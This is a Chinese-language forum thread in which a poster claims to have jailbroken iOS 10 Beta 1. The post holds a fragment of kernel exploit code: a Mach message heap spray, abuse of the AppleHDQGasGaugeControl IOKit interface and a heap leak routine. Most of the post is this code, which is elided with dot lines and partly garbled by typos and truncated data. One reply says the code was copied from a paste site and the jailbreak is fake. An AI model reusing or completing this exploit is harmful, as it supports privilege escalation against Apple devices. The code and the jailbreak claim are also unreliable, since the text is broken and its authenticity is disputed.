搜尋
搜尋

IOS 10 Beta 1 成功越獄

前往頁尾
@@卜龍功@@
@@卜龍功@@
@@卜龍功@@
46分
樓主
2016-06-18 17:10
目前只是測式階段,請不要炮我.....以下是目前蟲洞的一小部份原始碼,不知目前的蟲洞在Beta 2 或將來的正式版推出時會不會被封掉,希望接下來的測式皆段都能順利更期待有機會將來在IOS 10 正式版發表的一小時後能是由 台灣的卜龍功我發表出越獄程式...哈哈哈 癡人說夢話中 別炮我 > <






int la = OS_SPINLOCK_INIT;
int lb = OS_SPINLOCK_INIT;
extern "C" kern_return_t io_connect_method_scalarI_scalarO(
io_connect_t conn, uint64_t$1 selector,
io_scalar_inband64_t scalar_input,
mach_msg_type_number_t scalar_inputCnt,
io_struct_inband_t inband_output,
mach_msg_type_number_t *inband_outputCnt
);

io_connect_t con;
int c = OS_SPINLOCK_INIT;
int macDhm = OS_SPINLOCK_INIT;

typedef struct {
mach_msg_header_t header;
mach_msg_body_t body;
mach_msg_ool_descriptor_t desc[64];
mach_msg_trailer_t trailer;
} oolmsg_jumbo_t;

typedef struct {
mach_msg_header_t header;
mach_msg_body_t body;
mach_msg_ool_descriptor_t desc[1];
mach_msg_trailer_t trailer;
} oolmsg_t;
mach_port_t th1port = 0;
int32_t go = 0;
__attribute__((always_inline)) static inline
__unused void send_kern_data(char* vz, size_t svz, mach_port_t* msgp) {
oolmsg_t *msg=(oolmsg_t *)alloca(sizeof(ooPlmsg_t)+0x3000);
if(!*msgp){
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, msgp);
mach_port_insert_right(mach_task_self(), *msgp, *msgp, MACH_MSG_TYPE_MAKE_SEND);
}
bzero(msg,sizeof(oolmsg_t));
msg->header.msgh_local_port = MACH_PORT_NULL;
msg->header.msgh_size = sizeof(oolmsg_t);
msg->header.msgh_id = 0;
msg->body.msgh_descriptor_count = 0;
msg->desc[0].address = (void *)vz;
msg->desc[0].size = svz;
msg->desc[0].type = MACH_MSG_OOL_DESCRIPTOR;
msg->header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
msg->header.msgh_bits |= MACH_MSGH_BITS_COMPLEX;
msg->header.msgh_remote_port = *msgp;
mach_msg( (mach_msg_header_t *) msg, MACH_SEND_MSG, sizeof(oolmsg_t), 0, 0, 0, 0 );
}
__attribute__((always_inline)) static inline
__unused char* read_kern_data(mach_port_t port) {
oolmsg_t *msg=(oolmsg_t *)alloca(sizeof(oolmsg_t)+0x2000);
bzero(msg,sizeof(oolmsg_t)+0x2000);
mach_msg((mach_msg_header_t *)msg, MACH_RCV_MSG, 0, sizeof(oolmsg_t)+0x2000, (port), 0, MACH_PORT_NULL);
return (char*)msg->desc[0].address;
}
__unused void drop_kern_data(mach_port_t port) {
oolmsg_t *msg=(oolmsg_t *)alloca(sizeof(oolmsg_t)+0x2000);
bzero(msg,sizeof(oolmsg_t)+0x2000);
mach_msg((mach_msg_header_t *)msg, MACH_RCV_MSG, 0, sizeof(oolmsg_t)+0x2000, (port), 0, MACH_PORT_NULL);
vm_deallocate(mach_task_self(), (vm_address_t) msg->desc[0].address,msg->desc[0].size);
}

char ppad[0x10000];
#import <sys/event.h>
void pwn_this_bitch(mach_port_t a, mach_port_t b) {

static uint64_t heap_leak_ptr = 0;
static io_connect_t heap_leak_conn = 0;
static char* heap_leak = 0;
char mmsg[0x300];
oolmsg_t* msg = (oolmsg_t*)mmsg;
mach_msg((mach_msg_header_t *)msg, MACH_RCV_MSG|MACH_RCV_TIMEOUT, 0, sizeof(oolmsg_t)+0x2000, a, 1000, MACH_PORT_NULL);
msg->header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
msg->header.msgh_bits |= MACH_MSGH_BITS_COMPLEX;
msg->header.msgh_size = sizeof(oolmsg_t);
msg->header.msgh_id = 1;
msg->header.msgh_local_port = MACH_PORT_NULL;

msg->header.msgh_remote_port = a;
mach_msg( (mach_msg_header_t *) msg, MACH_SEND_MSG, sizeof(oolmsg_t), 0, 0, 0, 0 );
assert(*(uint32_t*)(msg->desc[0].address) == 0x13371337);

kern_return_t err;
io_iterator_t iterator;
IOServiceGetMatchingServices(masterPort, IOServiceMatching("AppleHDQGasGaugeControl"), &iterator);
io_service_t gg = IOIteratorNext(iterator);
.
.
.
.
.
.
.
.
.
.
.

.
.
.
.
.
<data>AwDOAO++rd4AAAAAAAAAAFABAAAAAAAA/v4xQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</data><key>2</key><data>AwAAAO++rd4AAAAAAAAAAFABAAAAAAAA/v4xQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.

..

..

.AAAAAAAAAAAAAAAAA</data><key>8</key><data>AwADOO++rd4AAAAAAAAAAFABAAAAAAAA/v4xQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</data><key>step1</key><data></data></dict>";

io_connect_t cnn=0;

mach_port_t spray;
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &spray);
mach_port_insert_right(mach_task_self(), spray, spray, MACH_MSG_TYPE_MAKE_SEND);
~
..

.
.
.
.
.
.
..

.
mach_msg( (mach_msg_header_t *) msg, MACH_SEND_MSG, sizeof(oolmsg_t), 0, 0, 0, 0 );

usleep(10);
mach_msg((mach_msg_header_t *)msg, MACH_RCV_MSG|MACH_RCV_TIMEOUT, 0, sizeof(oolmsg_t)+0x2000, b, 1000, MACH_PORT_NULL);
mach_msg((mach_msg_header_t *)msg, MACH_RCV_MSG|MACH_RCV_TIMEOUT, 0, sizeof(oolmsg_t)+0x2000, spray, 1000, MACH_PORT_NULL);
mach_msg((mach_msg_header_t *)msg, MACH_RCV_MSG|MACH_RCV_TIMEOUT, 0, sizeof(oolmsg_t)+0x2000, spray, 1000, MACH_PORT_NULL);
io_service_open_extended(gg, mach_task_self(), 0, NDR_record, bf, strlen(bf)+1, &err, &cnn);
if(cnn == 0) {
return;
}

__unused uint64_t n[10] = {0};

if (!heap_leak_ptr) {
io_object_t obj=0;
io_iterator_t iter;
io_connect_t smashconn = 0;

usleep(10);
mach_msg((mach_msg_header_t *)msg, MACH_RCV_MSG|MACH_RCV_TIMEOUT, 0, sizeof(oolmsg_t)+0x2000, a, 4000, MACH_PORT_NULL);
io_service_open_extended(gg, mach_task_self(), 0, NDR_record, 0, 0, &err, &smashconn);
NSLog(@"conn %d", smashconn);
assert(smashconn);

IORegistryEntryCreateIterator(gg, "IOService", kIORegistryIterateRecursively, &iter);
io_object_t object = IOIteratorNext(iter);
assert(object);
char search_str[400] = {0};
sprintf(search_str, "pid %d", getpid());
while (object != 0)
{
char buffer[9192] = {0};
uint32_t size = sizeof(buffer);
if (IORegistryEntryGetProperty(object, "IOUserClientCreator", buffer, &size) == 0)
{
if (strstr(buffer, search_str) != NULL)
{
if (IORegistryEntryGetProperty(object, "step1", buffer, &size) == 0)
{
obj = object;
break;
}
}
}
IOObjectRelease(object);

object = IOIteratorNext(iter);
}

2016-06-18 17:10 發佈
文章關鍵字 iOS 10 beta 1 10
kailin2529
kailin2529
kailin2529
1分
2樓
2016-06-18 17:34
台灣加油,台灣加油,台灣加油,台灣加油
yuhdiing
yuhdiing
yuhdiing
  • yuhdiing
  • 個人積分:250分
    文章編號:60631106
250分
3樓
2016-06-19 0:20
剛剛看了比較詳細的資訊.
原來 4s 已經無法升級了.
本來想說 升級後 在越獄
然後降級回 6.13
看來, 壞不了的 4s 快要變成鬧鐘使用了
網路成癮患者啦
bill.s-111
bill.s-111
bill.s-111
7分
4樓
2016-06-19 7:51
怎麼辦到的,可以教一下嗎?
littlebrother0326
littlebrother0326
littlebrother0326
1分
5樓
2016-06-19 9:06
你的程式碼應該是這裡複製來然後自己小改一下的
https://ghostbin.com/paste/qw8z7
而那個Cydia只是個WebApp而已吧
瘋先生
瘋先生
瘋先生
  • 瘋先生
  • 個人積分:3分
    文章編號:60634778
3分
6樓
2016-06-19 12:41
內文搜尋
搜尋
從 APP 打開從 APP 打開
X
X
加入好友名單
取消 確定
評分
取消 確定
評分
取消 確定
複製連結
複製
留言回報
取消 確定
Mobile01提醒您
您目前瀏覽的是行動版網頁
是否切換到電腦版網頁呢?